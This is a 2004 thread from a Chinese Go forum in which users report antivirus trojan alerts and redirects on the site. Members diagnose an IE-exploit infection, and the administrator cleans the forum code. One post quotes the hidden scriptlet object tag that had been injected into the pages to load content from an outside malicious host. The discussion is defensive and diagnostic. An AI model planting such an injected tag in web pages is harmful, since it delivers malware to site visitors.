飞扬围棋

标题: 进入论坛怎么有病毒???? [打印本页]

作者: 棋侠    时间: 2004-7-20 19:04
标题: 进入论坛怎么有病毒????
今天进入论坛,老是显示无法打开,定向有问题,显示有病毒,大家也有这种情况吗??

作者: 雪茄    时间: 2004-7-20 19:31
不好意思。没有!
作者: syp681    时间: 2004-7-20 20:05
我也有
作者: zpat    时间: 2004-7-20 20:27
没有
作者: 雪茄    时间: 2004-7-20 20:31
有病毒怎么在此留的言?!
作者: yale01    时间: 2004-7-20 21:14
没有异常情况呀
作者: syp681    时间: 2004-7-20 21:22
好象有人有,有人没有,我装的是瑞星
作者: arss    时间: 2004-7-20 21:24
我进来的时候也发现了病毒。
作者: 阿扬    时间: 2004-7-20 21:42
我有的是NORTON,没有显示有压
作者: 棋侠    时间: 2004-7-21 00:05
现在飞扬的主站也有这种情况了:((
作者: 阿浩    时间: 2004-7-21 00:20
没发现有病毒啊。
作者: zaterran    时间: 2004-7-21 02:58
我有…好像是某gif檔
大概是误判吧

作者: 蓝脸兔75    时间: 2004-7-21 09:02
可以把现象说清楚一点吗???
各位出现问题的IE版本,以及安全设置是什么情况??

俺经常上这里来,还没有报过错误。
大家共同解决这个问题!
作者: 宜城老僧    时间: 2004-7-21 09:23
一机连入正常,另一机出现以下错误信息[attach]2935[/attach]
作者: lleon    时间: 2004-7-21 09:29
打开飞扬的每个网页都会出现上面的对话框,很烦啊
作者: wqztc    时间: 2004-7-21 09:42
打开任何一页我的瑞星就报告发现病毒
Trojan.MiniSnake.b
作者: 棋侠    时间: 2004-7-21 11:24
对,就是老僧截的这个画面,我打开每个页面都出现,还无法上传东西!
作者: 阿扬    时间: 2004-7-21 11:40
这是什么问题。我的几个机器都没有这个问题
作者: 蓝脸兔75    时间: 2004-7-21 12:10
这是利用IE的漏洞给客户端种植木马的问题。
首先,建议各位棋友先将IE升级,可以到windows update上面升级。直接从开始-》windows update,然后安装所有关键补丁。但是安装时,不要一口气装7、8个补丁,这样可能导致windows不响应。一次,装2~3个。
其次,请飞扬,看看你的网页的html框架中,是否有人隐藏了什么特别的程序或文件。一般会有人将这些东西隐藏在页面框架里面,利用它来做重定向。
第三,如果各位出现问题的棋友发现有这样一个svch0st_.exe进程的话,很不幸,你已经中招了。不过不要紧,用一些专杀工具干掉它。可以到金山或瑞星那里找到。
作者: Fish    时间: 2004-7-21 12:39
查看页面源文件,比以前多了以下的内容。
《object type="text/x-scriptlet" width="1"  height="1" data="http://www.2746.com/1/1/pic.htm"》《/object》

应该是兔子所说的情况,被人利用IE或动网论坛的漏洞加了东西。
大家可先去兔子给出的下面的网址查看具体说明

http://dev.csdn.net/develop/article/30/30520.shtm

现在还在出差中,预计今晚回去。回去后仔细检查论坛程序并处理

作者: jehovahwu    时间: 2004-7-21 12:52
确实有点不正常
作者: 天堂的阶梯    时间: 2004-7-21 12:56
我也提示有病毒,从昨天开始的,
作者: 飞天棋神    时间: 2004-7-21 13:15
我的今天提示有病毒,请站长查一下.
作者: zaterran    时间: 2004-7-21 17:04
显示的病毒 : backdoor.AKM o.o
作者: Fish    时间: 2004-7-21 22:27
现在好了,俺修改了论坛的源文件,重新上传了。哎呀呀,网络真是到处有风险啊
作者: windy967    时间: 2004-7-22 00:21
昨天是有这个问题,但是现在好了

作者: stoneye58    时间: 2004-9-3 20:17
我有NORTON 看不出来
作者: bysunchao    时间: 2004-9-3 20:37
没有。
作者: 波斯美酒    时间: 2004-9-3 20:54
晕,这么老的帖子。。。
作者: 楚江微    时间: 2004-9-3 23:22
刚刚我上来的时候就被重定向到一个花哨的网页上了,我还以为点错了

欢迎光临 飞扬围棋 (http://flygo.net/bbS/) Powered by Discuz! X3.2